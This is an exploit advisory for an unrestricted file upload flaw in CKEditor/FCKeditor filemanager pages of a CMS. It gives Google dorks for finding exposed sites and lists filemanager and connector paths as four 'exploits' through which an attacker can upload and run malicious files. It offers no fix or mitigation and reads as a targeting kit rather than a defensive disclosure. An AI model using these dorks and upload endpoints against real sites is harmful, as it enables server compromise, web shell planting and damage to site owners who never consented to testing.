[+] Title: filemanager File Upload vulnerability
[+] Date: 2020-05-02
[+] Author : h4shur
[+] Tested on: Windows 10 & Google Chrome
[+] Version : All Versions
[+] Category : Web Application Bugs
[+] Vulnerable File: index.html?CKEditor=
[+] Dorks: inurl:/ckeditor/filemanager/
inurl:/ckeditor/filemanager/index.html?CKEditor=
### Note:
* In previous exploits that I or his friends had discovered, all vulnerabilities were first in the (html) folder, then in the (js) folder, and then in the (editor) folder.
It should be noted, however, that this vulnerability does not exist in similar CMSs such as Life Ray, and it does exist in other CMSs that can be accessed by Google Dork on sites affected by this vulnerability. To be obtained.
* Regarding this vulnerability, I have discovered several vulnerabilities in this CMS that can lead to file uploads through which the attacker can execute all his malicious code.
Which eventually leads to damage to the site and the server.
* If you're careful, it's in the FCKeditor folder found by friends, and in the CKeditor folder I found.
This exploitation has been tested in all versions of the cms, and the file can be uploaded to all tested sites.
* exploits found by friends ("FCKeditor" folder note):
/html/js/editor/fckeditor/editor/filemanager/browser/liferay/browser.html
* exploits found by me (see "CKeditor" folder):
/html/js/editor/ckeditor/editor/filemanager/browser/liferay/browser.html
/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html
* Newly discovered exploits (see "CKeditor" folder)(Go to the "html", "js" folders and then "edit" the folder folders, you'll see that they don't exist and there isn't even a LifeRay name.):
/ckeditor/filemanager/index.html?CKEditor=
/ckeditor/filemanager/connectors/test.html
/ckeditor/filemanager/connectors/uploadtest.html
/ckeditor/filemanager/browser/default/browser.html
* This CMS allows the attacker to upload or transfer files of dangerous types that can be automatically processed in the product environment. Uploaded files pose significant risks to applications.
### POC:
[+] Exploit 1 : site.com/ckeditor/filemanager/index.html?CKEditor=
[+] Exploit 2 : site.com/ckeditor/filemanager/connectors/test.html
[+] Exploit 3 : site.com/ckeditor/filemanager/connectors/uploadtest.html
[+] Exploit 4 : site.com/ckeditor/filemanager/browser/default/browser.html
### Contact Me :
* Telegram : @h4shur
* Email : h4shursec@gmail.com
* Instagram : @netedit0r
* twitter : @h4shur